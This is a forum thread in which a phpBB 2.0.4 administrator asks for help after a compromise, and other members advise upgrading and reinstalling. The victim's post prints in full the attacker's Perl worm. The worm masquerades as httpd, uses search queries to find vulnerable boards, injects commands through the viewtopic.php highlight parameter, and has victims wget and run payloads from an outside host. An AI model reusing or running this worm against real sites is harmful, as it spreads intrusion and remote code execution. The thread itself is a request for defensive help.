Hacked - pls help

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
btfans
Forum Newbie
Posts: 22
Joined: Thu Jun 10, 2004 10:58 am

Hacked - pls help

Post by btfans »

feyd | Please use

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]


Hacked - pls help

Dear All,

**** pls excuse me if this was NOT posted to a correct category ****

My phpBB (/var/www/html/phpBB2 running in FC3) wrongly allow 777 and attacked by this hacker
(ip=81.196.20.134)
the /tmp/.666 and /tmp/.lick are invoked continuously seems phpBB is run.

And result in substantial problem on the sh (defunct) (zombie) processes.

I want expert advice:

1) how it is invoked?
2) how to STOP ?
3) now I only deny from the ip for access /var/www/html using .htaccess.

Mathew


------------------- lick.txt -------------------------

[syntax="perl"]#### Nu exista patch pentru prostia umana ##### 
 ########### Romania ######################### 
    ###### Crash@WhiteHat.Cc ###### #
 
use strict; 
use IO::Socket; 
use IO::Handle; 
 
 
my $process = '/usr/sbin/httpd';  
$0="$process"."\0"x16;; 
my $pid=fork; 
 
 
sub fetch(); 
sub remote($); 
sub http_query($); 
sub encode($); 
 
sub fetch(){ 
    my $rnd=(int(rand(9999))); 
    my $s= (int(rand(1000))); 
    if ($rnd>1000) { $s= (int(rand(100)))} 
  
     
 
    my @str=( 
             "%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22", 
             "%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777", 
             "viewtopic.php%3Ft", 
             "%22View+next+topic%22", 
             "%22View+previous+topic%22", 
             "viewtopic.php+%22Log+in+to+check+your+private+messages%22", 
             "%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p", 
             "%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22", 
             "viewtopic.php+%22by+phpBB+2001%22", 
             "viewtopic.php+%22by+phpBB+2000%22", 
             "viewtopic.php+%22by+phpBB+2002%22", 
             "viewtopic.php+by+phpBB+2003%22", 
             "viewtopic.php+%22by+phpBB+2004%22", 
             "%22ALEKS+HACKED+YOUR+SYSTEM%22", 
             "viewtopic.php+%22by+phpBB+2005%22", 
             "viewtopic.php+%22by+phpBB+2006%22", 
             "intitle%3A%22%3A%3A+View+topic%22", 
             "viewtopic.php+%22+phpBB+Group%22", 
             "%22topic.php%3Ft%3D%22", 
             "%22%3A%3A+View+topic%22", 
 ); 
 
    my $query="search.msn.com/results.aspx?q="; 
    $query.=$str[(rand(scalar(@str)))].$rnd; 
    $query.="&first=$s"; 
 
    my @lst=(); 
    my $page = http_query($query); 
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){ 
        if ($1 !~ m/msn|cache|hotmail/){ 
            push (@lst,$1); 
        } 
    } 
     
    return (@lst); 
} 
 
sub http_query($){ 
    my ($url) = @_; 
    my $host=$url; 
    my $query=$url; 
    my $page=""; 
    $host =~ s/href=\"?http:\/\///; 
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; 
    $query =~s/$host//; 
    if ($query eq "") {$query="/";}; 
    eval { 
        local $SIG{ALRM} = sub { die "1";}; 
        alarm 10; 
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; 
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n "; 
        my @r = <$sock>; 
        $page="@r"; 
        alarm 0; 
        close($sock); 
    };     
    return $page; 
 
} 
 
sub encode($) { 
    my $s = shift; 
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg; 
    $s =~ s/%252E$//; 
    return $s; 
} 
 
 
 
eval {fork and exit;}; 
 
my $iam=$ARGV[0]; 
my $oneday=time+3600;  
my $page=""; 
my @urls; 
my $url; 
 
 
 
 
 
 
while(time<$oneday){ 
    @urls=fetch(); 
    foreach $url (@urls) { 
    if ($url !~ /viewtopic.php/) {next;} 
    $url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/; 
    my $cmd=encode("perl -e \"print q(jSVowMsd)\""); 
    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
    $page = http_query($url); 
    if ( $page =~ /jSVowMsd/ ){ 
        $url =~ s/&highlight.*//; 
        my $upload=$url; 
        $upload =~ s/viewtopic.*//; 
        $cmd="wget http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick";    # set cmd 
        $cmd=encode("$cmd");    # set cmd 
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
        $page = http_query($url); 
        $cmd="wget http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";    
        $cmd=encode("$cmd");    # set cmd 
        $url =~ s/&highlight.*//; 
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
        $page = http_query($url); 
    } 
 
    } 
}

feyd | Please use[/syntax]

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

It would appear that this perl script is designed specifically for phpBB 2.0.4 a very old version of phpBB. I'd seriously suggest upgrading to the latest.

Other than that, I'd ask over at phpBB's support forums.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

If you've been hacked, the best thing to do is perform a clean install and then attempt to import in the old data.
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Search the phpBB community for 'site hacked'. You will find a lot of information on their site. They also offer quite a few suggestions for getting your board back online.

As Feyd suggested, you really should upgrade your board. The current version is 2.0.20 so yours is a little out of date. But before you update, dump your MySQL database to a file and backup whatever files that you can (especially if you modded your board). Then do whatever the phpBB docs or community say to do.
btfans
Forum Newbie
Posts: 22
Joined: Thu Jun 10, 2004 10:58 am

Post by btfans »

Finally remove the phpBB 2.0.4, and resinatall the new version. - FIXED.
Thank you all for help.
Post Reply